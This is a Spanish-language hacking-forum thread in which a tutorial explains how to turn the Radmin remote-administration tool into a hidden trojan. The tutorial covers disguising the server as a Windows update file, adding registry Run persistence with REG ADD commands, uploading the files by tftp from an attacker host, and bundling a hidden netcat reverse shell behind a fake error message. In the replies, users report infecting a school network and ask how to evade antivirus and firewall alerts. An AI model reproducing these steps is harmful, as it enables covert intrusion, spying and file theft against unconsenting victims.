Troyanizando Radmin 2.1 control remoto

Iniciado por octalh, 4 Febrero 2005, 11:59 AM

0 Miembros y 1 Visitante están viendo este tema.

octalh

Troyanizando radmin 2.1

Hola lo mas problable es que muchos ya sepan como hacerlo, pero creo que la informacion nunca esta demas, asi que aqui va.

pues bien, radmin es una herramienta de administracion remota que nos permitira tener:

*Escritorio remoto de nuestra victima
*Espiar escritorio
*Subir y bajar archivos
*Shell remota


Yo utilice la versión 2.1 no se si con otras funcione, la web oficial de radmin es www.radmin.com

empecemos ya, voy a poner los pasos enumerados

1.- Nos bajamos el radmin, y lo instalamos en nuestra maquina

2.-Abrimos una shell, para eso nos vamos a inicio---- ejecutar---cmd.exe o cmommand.com segun sea el caso y nos dirigimos al directorio donde instalamos radmin

Citarc:\archivos de programa\radmin\

y ejecutamos r_server.exe /setup

Citarc:\archivos de programa\radmin\r_server.exe /setup

nos aparecera una ventana en la que podremos configurarlo a nuestro gusto.

3.-Escojemos la opcion Set password

ahora procedemos a introducir nuestro password, deben ser como minimo 8 caracteres, revisen que no este activada la opcion de Enable NT security y le damos en OK

ahora nos dirigimos a la opcion Options

en port pongan el que quieran, es el puerto que radmin usara para conectarce, de preferencia usen puertos arriba de 1000 para no levantar sospechas

en trai icon palomeen la opcion Hide trai icon, de esa manera cuando el servidor de radmin se ejecute en la maquina victima no se vera ningun icono

en las demas opciones asegurence de que todo esta desactivado, no quremos dejar logs de ningun tipo, ahora le damos en OK y en Exit.

ya tenemos nuestro radmin bien configurado  :) ahora viene lo bueno

voy a explicar dos metodos, uno para instalarlo desde shell remota de usuario y otra para hacer un solo ejecutable que ya tenga nuestro radmin y su configuracion.  bueno eso si veo interes en la gente del foro  :P

4.- bamos a ir al registro de windows a la siguiente clave:
HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters

y vamos a fijarnos en las siguientes entradas:

Port aqui esta el puerto que pusimos solo que en hexadecimal
Parameter esta es la contraseña
DisableTrayIcon es la opcion para ocultar el icono

lo que vamos a hacer es copiar los valores de esas tres entradas, porque ahorita las vamos a usar, en mi caso estos fueron los valores

Port  b7060000 yo use el puerto 1719
Parameter  3Ab503515d51eb10c3f98c7ab7bc5993
DisableTrayIcon  01000000 este debe estar asi

5.-Ahora nos dirigimos a la carpeta donde tenemos el radmin y le cambiamos el nombre a r_server.exe por otro menos sospechoso, yo le puse al mio waudt.exe y con la herramienta reshack le cambie el icono, yo le puse el de las actualizaciones automaticas (wuauclt.exe)

6.-Bien ahora vamos a hacer un bat que nos agrege las llaves en el registro y que arranque a radmin con el inicio del sistema.

codigo:

CitarREG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "b7060000"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "3Ab503515d51eb10c3f98c7ab7bc5993"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000"
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuauclt /t REG_SZ /d "C:\windows\system32\wuaudt.exe"

solo sustituyan los valores por los suyos.

7.-Subir archivos via tftp

una ves que tengamos una shell remota de la victima vamos a subirle a radmin, para eso siguiendo el ejemplo que estoy poniendo seria:

Citartftp -i xxx.xxx.xxx.xxx get wuaudt.exe C:\windows\system32\wuaudt.exe
este es el radmin ya debidamente camuflageado

Citartftp -i xxx.xxx.xxx.xxx get AdmDll.dll C:\windows\system32\AdmDll.dll
la dll del radmin, no le cambien el nombre

Citartftp -i xxx.xxx.xxx.xxx get 1025.bat C:\windows\system32\1025.bat
este es el bat que se encarga de agregar los valores en el registro, pueden agregarle un del al final del bat para no dejar rastros (ejem: del 1025.bat)

ahora solo basta con ejecutar el bat desde la shell y ya tendremos todo listo para el proximo reinicio, pero como nosotros somos muy impacientes y no podemos aguantar hasta el prox reinicio....

8.- Ejecutar radmin

desde la shell
Citarwuaudt.exe /pass:mipassword /port:tupuerto

yo le puse a mi radmin wuadt.exe pero tu puedes ponerle como quieras, de esta forma ya puedes entrar con el cliente (radmin.exe) a hacer lo que te plasca sin nececidad de reinicar y la proxima ves que se inicie windows, radmin ya estara listo esperando tu conexion

bien aqui termino este tuto espero que les sirva de algo, a mi me a servido bastante y espero que a ustedes tambien

adios... ::)

Tutorial escrito por: OCTALH

octalh

#1
Tutorial troyanizando radmin segunda parte...

en esta ocacion vamos a hacer de radmin un solo ejecutable, que con solo un doble clic se instale con toda nuestra configuracion  ;)

1.- Lo primero que haremos sera bajarnos una herramienta muy util que nos permitira empaquetar todos nuestros archivos. la pueden descargar de esta direccion  http://www.ifrance.com/IsAhT/joiner/IPacker%20Tool.zip

2.- una ves que lo bajemos lo descomprimimos y ejecutamos IPacker Tool.exe ahora nos disponemos a agregar nuestros archivos.

3.- escojemos la opcion agregar, y despues en ejecutable eso nos va enviar a un panel donde podemos poner el archivo que queremos agregar, seleccionamos en el icono de la carpeta y escojemos al servidor de radmin, en mi caso se llama wuaudt.exe ya con otro icono para camuflagearlo.
ahora vamos a indicarle donde se debe extraer el archivo, para eso damos click sobre la flecha que apunta a la izquierda y escojemos %Systemdir%, en mi caso quedo asi: %Systemdir%\wuaudt.exe y le marcamos como archivo del sistema nota: no escojan la opcion de que se ejecute al extraer, recuerden que si se ejecuta no va servir porque aun no tiene su dll copiada ni sus entradas en el registro. bueno ya que esta todo le damos en aceptar

4.- escojemos la opcion agregar y en active x (ocx) extensión de la app. (dll), ahora escojemos la dll de radmin AdmDll.dll y le indicamos que se copien en %Systemdir%, seleccionan la opcion registrar y de archivo del sistema, por ultimo aceptar

5.-escojemos la opcion agregar y en comandos, haí vamos a cargar la configuracion del radmin, recuerdan el bat que hicimos en la primera parte? bien pues lo vamos a volver a usar, para eso damos clic en el icono del bat y abrimos el bat que habiamos hecho, automaticamente se van a cargargar todas las entradas, y le damos en aceptar

6.-denuevo escojemos la opcion agregar luego comando y vamos a agregar la siguiente linea
Citarradmin.exe /pass:xxxxxxxx /port:xxxx
en mi caso queda asi:
Citarwuaudt.exe /pass:xxxxxxxx /port:1719
le damos en agregar y por ultimo aceptar

7.-pues esto ya casi queda, pero le vamos a agregar una cosa mas, netcat, si,  debido a que radmin es de conexion directa, vamos a tener problemas con la ip ademas si es red, ya sben el cuete de los routers, entonces pasandole el netcat podemos ejecutar una reverse shell, para eso nos vamos a agregar luego a ejecutable, en archivo le cargamos el netcat, y le indicamos que se copie a %Systemdir%, de preferencia ponganle otro nombre menos llamativo, mas de dos si sabran que es nc.exe, yo le puse al mio aviax.exe, seleccionen la opcion ejecutar tras extraer y ejecutar oculto, luego seleccionamos la opcion iniciar en cada inicio, y selecionen donde queren poner la entrada en el registro, yo la puse en HKLM y de nombre le puse aviax, en parametros le ponemos los de la reverse shell
Citar -d -e cmd.exe xxx.xxx.xxx.xxx 1717
, y seleccionamos la opcion de archivo del sistema, por ultimo aceptar.

8.-ya acabamos ufff, ya solo falta agregarle un ultimo detalle para despistar, nos vamos a agregar, luego a mensajes emergentes y le ponemos un mensaje error yo le puse:
Citartitulo : Error
mensaje: Error de lectura aplicación win32 no valida
y aceptar

ahora nos dirigimos a opciones, luego cargar icono, y le ponemos el icono de un juegito o un programa

haí mismo tienen la opcion de salvar la configuracion, para tener lo que hicimos de respaldo, y si quieren le marcan la casilla para que se borre automaticamente una ves que sea ejecutado, luego aceptar

9.- por ultimo le damos en generar, y ya tenemos nuestro radmin con su configuracion y ademas netcat que con el inicio del sistema nos dara una reverse shell, ya saben si tienen ip dinamica se ponen un dominio que redireccione a su ip www.no-ip.com

10.-ahora solo abren netcat, lo ponen en escucha -L -p 1717 -vv, le mandan el radmin a la victima, y cuando lo ejecute les dara la shell ya despues abren el cliente de radmin, se conectan a la ip que les de el netcat y a espiar!! y bajarle archivos  :)

yo hice un removedor con la misma herramienta solo selecionen que finalice el proceso del radmin y netcat, por si se estan ejecutando y despues que borre los archivos y llaves en el registro. y ya tienen radmin troyanizado, junto con su removedor incluido

saludos y suerte con las pruevas

Tutorial escrito por: OCTALH

Gospel

Oye, esto es muy interesante!!  :) No sólo sigues el mismo camino q utilizamos nosotros para Troyanizar el VNC, sino q tb te has currado lo de instalar el Radmin desde un ejecutable preparado... te ha quedado genial!!

Referencia: Troyanizando VNC - Control Remoto Invisible @ http://foro.elhacker.net/index.php/topic,41671.0.html

Has hecho un buen trabajo, lo he agregado al hilo de Recopilación de Manuales y Textos interesantes.

Muchas gracias, octalh!

Salu2

xpinete

hola a tod@s, soy un novatillo en el tema de manejarme con windows a nivel de consola, me gustaría saber en el caso de realizar el desinstalador ¿cómo finalizo remote administrator desde consola? ::). He estado mirando el comando taskkill, pero si lo hago de forma automática no sabría el PID del proceso ¿verdad?. Salu2. :P

n3o07

Esta muy bueno, tu manual "octalh", felicidades!!!!!!!!

Lo he probado en la red de mi escuela y funciona a la perfección...  ;D

solo tengo un pequeño problema, que si lo dejo que se active a una determinada hora, y la victima tiene Norton Antivirus, cuando se ejecuta el "r_server.exe", el norton le avisa que hay un programa tratando de comunicarse con él... :'(

alguien sabe si existe alguna manera de desactivar el norton. y que no le aparezca la ventana de notificacion???


The Matrix - Believe The Unbelievable

«--´¯`--–...•´--».-.- >  µ ∂   η3ο07   ¶  ƒ <  -.-.«-`•...–--´¯`-----»

octalh

Pues yo hace tiempo que tenia norton y recuerdo que en las opciones habia una opcion para agragar carpetas o archivos que no quisieras que norton tocara, yo lo hacia para excluir a mis herramientas porque algunas me las borraba, revisa eso y si es asi, le indicas a norton que se brinque el radmin, despues exportas la llave del registro donde se guardan las carpetas y archivos que exluyes y se la importas a la victima

n3o07

Creo que no me explique bien.... :'(

Lo que me pasa es que, cuando se ejecuta el "r_server.exe" en la victima (claro con otro nombre) y como la victima tiene Norton Antivirus 2004 junto con su Firewal (Norton Firewall Security), le aparece una ventana en la cual puede decidir si se ejecutará o no, el servidor  "r_server.exe" de Radmin; ademas le aparece mi direccion IP y el archivo que estoy tratando de ejecutar, asi como el puerto que estoy usando...

El firewall de windoze XP SP2 no da aviso alguno...!!!!!!!  eso es genial ;D

Existe alguna manera de desactivar el firewall de norton para que me deje conectarme con su máquina...


espero haberme explicado  :) y gracias por la respuesta "octalh"
The Matrix - Believe The Unbelievable

«--´¯`--–...•´--».-.- >  µ ∂   η3ο07   ¶  ƒ <  -.-.«-`•...–--´¯`-----»

xpinete

Hola, quería volver a insistir con el tema de cómo finalizar la ejecución del servicio de Remote Administrator y el programa Netcat cuando vayamos a realizar el desinstalador ???. Thanks.

Ertai

Cita de: xpinete en 26 Febrero 2005, 22:03 PM
Hola, quería volver a insistir con el tema de cómo finalizar la ejecución del servicio de Remote Administrator y el programa Netcat cuando vayamos a realizar el desinstalador ???. Thanks.
Usa el comando 'tasklist' y entonces sabras el PID, y luego el taskkill
Suerte,
Ertai
Si la felicidad se comprara, entonces el dinero sería noble.


void rotar_by_ref(int& a, int& b) {
   /* Quien dijo que no se podia sin una variable temporal? */
   *a = *a ^ *b;
   *b = *a ^ *b;
   *a = *a ^ *b;
}

xpinete

Si hago el desinstalador con IPacker Tool no podré detener el programa de forma automática ¿verdad?, porque necesitaría saber el PID para poder meter el comando taskkill dentro del paquete desinstalador :(. Thanks.